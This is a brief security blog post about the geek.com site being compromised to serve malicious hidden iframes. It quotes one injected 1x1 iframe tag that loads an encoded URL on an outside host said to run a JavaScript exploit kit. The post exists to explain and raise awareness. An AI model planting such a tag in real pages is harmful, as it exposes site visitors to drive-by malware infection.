Geek.com has been claimed as yet another target of website hijacking and the irony isn’t lost on anyone.  The popular “techie” site joins the ranks of msn.com as an extremely popular, high traffic site that has unknowingly turned to the dark side.  Reports indicate that geek.com has been serving malicious <iframe> scripts, unknowingly to site administrators or its users.

When taking a closer look at the source of an infected page (part of the geek.com domain in this example), we see the following line that performs the exploit:

 

 

 

 

 

 

 

 

 

<iframe src=”http://sator.vv.cc/QQkFBgOMBAEDAAABEKcJBQcEAQUEDAwDBQ== “ width=1 height =1 frameboarder=0></iframe>

This tag redirects the victim to a malicious website that hosts a common JavaScript exploit kit.   The responsibility to avoid these types of attacks cannot fall on the end user, as they are oblivious to these types of exploits.  Rather, it is up to site administrators to ensure their coding is tight and browser developers to institute various checks for known vulnerabilities when parsing a site.

Tags: , ,